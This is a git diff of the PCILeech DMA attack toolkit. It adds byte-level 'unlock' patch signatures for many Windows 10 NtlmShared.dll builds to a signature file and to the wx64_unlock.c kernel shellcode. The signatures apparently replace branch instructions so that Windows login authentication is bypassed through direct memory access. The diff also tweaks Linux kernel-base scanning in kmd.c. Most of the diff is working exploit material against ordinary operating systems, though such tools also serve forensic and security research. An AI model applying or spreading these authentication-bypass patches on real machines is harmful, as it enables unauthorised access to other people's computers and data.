diff --git a/files/unlock_win10x64.sig b/files/unlock_win10x64.sig index aa35d68..2eaeee4 100644 --- a/files/unlock_win10x64.sig +++ b/files/unlock_win10x64.sig @@ -2,20 +2,32 @@ # syntax: see signature_info.txt for more information. # # -# signature for Windows 10 x64 [NtlmShared.dll (2015-07-10)] +# signature for Windows 10 x64 [NtlmShared.dll (2015-07-10)/10.0.10240.16384] 5DF,FF154B1C,5E8,0F8518FB,5E8,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2015-10-30)] +# signature for Windows 10 x64 [NtlmShared.dll (2015-10-30)/10.0.10586.0] 62F,FF15B31B,638,0F8518FB,638,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2016-07-16)] +# signature for Windows 10 x64 [NtlmShared.dll (2016-07-16)/10.0.14393.0] 6dF,FF15D31B,6e8,0F8518FB,6e8,909090909090 # -# signature for Windows 10 x64 [NtlmShared.dll (2017-03-18)] +# signature for Windows 10 x64 [NtlmShared.dll (2017-03-18)/10.0.15063.0] 615,FF15C51C,61e,0F852EFB,61e,909090909090 +# signature for Windows 10 x64 [NtlmShared.dll (2019-09-30)/10.0.15063.2106] +625,FF15B51C,62e,0F852EFB,62e,909090909090 # # signature for Windows 10 x64 [NtlmShared.dll (2017-09-29)/10.0.16299.15] 615,FF15D51C,61e,0F852EFB,61e,909090909090 # # signature for Windows 10 x64 [NtlmShared.dll (2018-04-11)/10.0.17134.1] -695,FF15551C,69e,0F852EFB,69e,909090909090 \ No newline at end of file +695,FF15551C,69e,0F852EFB,69e,909090909090 +# +# signature for Windows 10 x64 [NtlmShared.dll (2018-09-15)/10.0.17763.1] +740,FF15B21B,749,0F840BFBFFFF,749,0F85 +# +# signature for Windows 10 x64 [NtlmShared.dll (2019-03-19)/10.0.18362.1] +# signature for Windows 10 x64 [NtlmShared.dll (2019-10-06)/10.0.18362.418] +741,32C0E904FBFFFF,741,32C0E904FBFFFF,741,B001E904FBFFFF +# +# signature for Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1] +426,48FF155320,435,0F84BAFAFFFF,435,0F85 \ No newline at end of file diff --git a/files/wx64_unlock.ksh b/files/wx64_unlock.ksh index 583856c..7657068 100644 Binary files a/files/wx64_unlock.ksh and b/files/wx64_unlock.ksh differ diff --git a/pcileech/kmd.c b/pcileech/kmd.c index d102ab5..6da8135 100644 --- a/pcileech/kmd.c +++ b/pcileech/kmd.c @@ -363,7 +363,7 @@ _Success_(return) BOOL KMD_LinuxFindFunctionAddrTBL_RelativeSymTabSearch(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbStart, _In_ PKERNELSEEKER pS) { DWORD o, oFn; - for(o = cbStart; o < cb - 8; o += 8) { + for(o = cbStart; o < cb - 8; o += 4) { if(o + *(PDWORD)(pb + o + 4) + 4 == pS->aSeek) { oFn = o + *(PDWORD)(pb + o); if((oFn < 0x02000000) && !(oFn & 0xf) && (oFn != o)) { @@ -455,9 +455,10 @@ BOOL KMD_Linux46KernelSeekSignature(_Out_ PSIGNATURE pSignature) QWORD KMD_Linux48KernelBaseSeek() { PPAGE_STATISTICS pPageStat = NULL; - BYTE pb[0x1000], pbCMP90[0x400], pbCMP00[0x100]; + BYTE pb[0x1000], pbCMPcc[0x400], pbCMP90[0x400], pbCMP00[0x100]; QWORD qwA, qwAddrMax, i; BOOL isAuthenticAMD, isGenuineIntel; + memset(pbCMPcc, 0xcc, 0x400); memset(pbCMP90, 0x90, 0x400); memset(pbCMP00, 0x00, 0x100); qwA = max(0x01000000, ctxMain->cfg.qwAddrMin) & 0xffffffffffe00000; @@ -482,8 +483,8 @@ QWORD KMD_Linux48KernelBaseSeek() if(!isGenuineIntel || !isAuthenticAMD) { continue; } - // Verify that page ends with 0x400 NOPs (0x90). - if(!LcRead(ctxMain->hLC, qwA, 0x1000, pb) || memcmp(pb + 0xc00, pbCMP90, 0x400)) { + // Verify that page ends with 0x400 NOPs (0x90) or 0x400 0xCC. + if(!LcRead(ctxMain->hLC, qwA, 0x1000, pb) || (memcmp(pb + 0xc00, pbCMP90, 0x400) && memcmp(pb + 0xc00, pbCMPcc, 0x400))) { continue; } // read kernel base + 0x1000 (hypercall page?) and check that it ends with at least 0x100 0x00. diff --git a/pcileech/version.h b/pcileech/version.h index 336c464..b00486b 100644 --- a/pcileech/version.h +++ b/pcileech/version.h @@ -3,8 +3,8 @@ #define VERSION_MAJOR 4 #define VERSION_MINOR 6 -#define VERSION_REVISION 1 -#define VERSION_BUILD 11 +#define VERSION_REVISION 2 +#define VERSION_BUILD 12 #define VER_FILE_DESCRIPTION_STR "The PCILeech Direct Memory Access Attack Toolkit" #define VER_FILE_VERSION VERSION_MAJOR, VERSION_MINOR, VERSION_REVISION, VERSION_BUILD diff --git a/pcileech_shellcode/wx64_unlock.c b/pcileech_shellcode/wx64_unlock.c index 17fb5c2..7126f46 100644 --- a/pcileech_shellcode/wx64_unlock.c +++ b/pcileech_shellcode/wx64_unlock.c @@ -129,59 +129,88 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages return E_FAIL; } -#define NUMBER_OF_SIGNATURES 10 +#define NUMBER_OF_SIGNATURES 13 NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase) { SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = { - { .chunk = { // win8.1x64 msv1_0.dll (2014-10-29) + // win8.1x64 msv1_0.dll (2014-10-29) + { .chunk = { { .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0x42, 0xA4 } }, { .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0x46, 0x88 } }, { .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win8.1x64 msv1_0.dll (2015-10-30) + // win8.1x64 msv1_0.dll (2015-10-30) + { .chunk = { { .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0xC2, 0x07 } }, { .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0xCE, 0xBC } }, { .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win8.1x64 msv1_0.dll (2016-03-16) + // win8.1x64 msv1_0.dll (2016-03-16) + { .chunk = { { .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0x22, 0x04 } }, { .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0xB2, 0xB9 } }, { .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2015-07-10) + // Windows 10 x64 [NtlmShared.dll (2015-07-10)/10.0.10240.16384] + { .chunk = { { .cbOffset = 0x5df,.cb = 4,.pb = { 0xff, 0x15, 0x4b, 0x1c } }, { .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, { .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2015-10-30::10.0.10586.0) + // Windows 10 x64 [NtlmShared.dll (2015-10-30)/10.0.10586.0] + { .chunk = { { .cbOffset = 0x62f,.cb = 4,.pb = { 0xff, 0x15, 0xb3, 0x1b } }, { .cbOffset = 0x638,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, { .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2016-07-16::10.0.14393.0) + // Windows 10 x64 [NtlmShared.dll (2016-07-16)/10.0.14393.0] + { .chunk = { { .cbOffset = 0x6df,.cb = 4,.pb = { 0xff, 0x15, 0xd3, 0x1b } }, { .cbOffset = 0x6e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, { .cbOffset = 0x6e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2017-03-18::10.0.15063.0) + // Windows 10 x64 [NtlmShared.dll (2017-03-18)/10.0.15063.0] + { .chunk = { { .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } }, { .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, { .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2017-09-29::10.0.16299.15) + // Windows 10 x64 [NtlmShared.dll (2019-09-30)/10.0.15063.2106] + {.chunk = { + {.cbOffset = 0x625,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } }, + {.cbOffset = 0x62e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, + {.cbOffset = 0x62e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + // Windows 10 x64 [NtlmShared.dll (2017-09-29)/10.0.16299.15] + { .chunk = { { .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xd5, 0x1c } }, { .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, { .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2018-04-11::10.0.17134.1) + // Windows 10 x64 [NtlmShared.dll (2018-04-11)/10.0.17134.1] + { .chunk = { { .cbOffset = 0x695,.cb = 4,.pb = { 0xff, 0x15, 0x55, 0x1c } }, { .cbOffset = 0x69e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, { .cbOffset = 0x69e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - {.chunk = { // win10x64 NtlmShared.dll (2019-10-06::10.0.18362.418) + // Windows 10 x64 [NtlmShared.dll (2018-09-15)/10.0.17763.1] + {.chunk = { + {.cbOffset = 0x740,.cb = 4,.pb = { 0xff, 0x15, 0xb2, 0x1b } }, + {.cbOffset = 0x749,.cb = 4,.pb = { 0x0f, 0x84, 0x0b, 0xfb } }, + {.cbOffset = 0x749,.cb = 2,.pb = { 0x0f, 0x85 } } } + }, + // Windows 10 x64 [NtlmShared.dll (2019-03-19)/10.0.18362.1] + // Windows 10 x64 [NtlmShared.dll (2019-10-06)/10.0.18362.418] + {.chunk = { {.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } }, {.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } }, {.cbOffset = 0x741,.cb = 2,.pb = { 0xb0, 0x01 } } } + }, + // Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1] + {.chunk = { + {.cbOffset = 0x426,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x53, 0x20 } }, + {.cbOffset = 0x435,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } }, + {.cbOffset = 0x435,.cb = 2,.pb = { 0x0f, 0x85 } } } } }; KERNEL_FUNCTIONS2 fnk2; diff --git a/readme.md b/readme.md index e455a27..9c7a290 100644 --- a/readme.md +++ b/readme.md @@ -70,8 +70,9 @@ Please find a summary of the supported software based memory acquisition methods | [VMware memory save file](https://github.com/ufrisk/LeechCore/wiki/Device_File) | File | No | No | Yes | No | | [TotalMeltdown](https://github.com/ufrisk/LeechCore/wiki/Device_Totalmeltdown) | CVE-2018-1038 | Yes | Yes | No | No | | [DumpIt /LIVEKD](https://github.com/ufrisk/LeechCore/wiki/Device_DumpIt) | Live Memory | Yes | No | No | No | -| [LiveKd](https://github.com/ufrisk/LeechCore/wiki/Device_LiveKd) | Live Memory | Yes | No | No | No | | [WinPMEM](https://github.com/ufrisk/LeechCore/wiki/Device_WinPMEM) | Live Memory | Yes | No | No | No | +| [LiveKd](https://github.com/ufrisk/LeechCore/wiki/Device_LiveKd) | Live Memory | Yes | No | No | No | +| [LiveCloudKd](https://github.com/ufrisk/LeechCore/wiki/Device_LiveCloudKd) | Live Memory | Yes | No | No | Yes | | [Hyper-V Saved State](https://github.com/ufrisk/LeechCore/wiki/Device_HyperV_SavedState) | File | No | No | No | Yes | | [LeechAgent*](https://github.com/ufrisk/LeechCore/wiki/Device_Remote) | Remote | | | No | No | @@ -234,3 +235,7 @@ v4.1 [v4.6](https://github.com/ufrisk/pcileech/releases/tag/v4.6) * Support for [LiveCloudKd](https://github.com/ufrisk/LeechCore/wiki/Device_LiveCloudKd). + +Latest: +* Bug fixes. +* Unlock signature updates - Win10/Linux (NB! most recent kernels on Linux not yet supported),